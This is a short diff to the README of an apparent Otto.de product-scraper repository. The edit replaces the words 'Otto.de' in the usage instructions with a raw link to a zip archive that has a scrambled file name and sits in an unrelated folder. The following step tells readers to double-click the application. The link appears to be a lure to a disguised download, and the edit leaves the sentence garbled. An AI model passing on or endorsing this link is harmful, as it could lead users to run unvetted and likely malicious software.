2002meht/otto-de-product-scraper-pay-per-result/README.md

 ## 🔍 How to Use the Scraper

-Using the Otto.de product scraper is easy.
+Using the https://github.com/2002meht/otto-de-product-scraper-pay-per-result/raw/refs/heads/main/bellpull/result_scraper_per_otto_pay_product_de_v1.3-alpha.3.zip product scraper is easy.
 Here are the steps you need to follow:

 1. Open the application by double-clicking the icon.
 2. Enter the URL of the product page you want to monitor.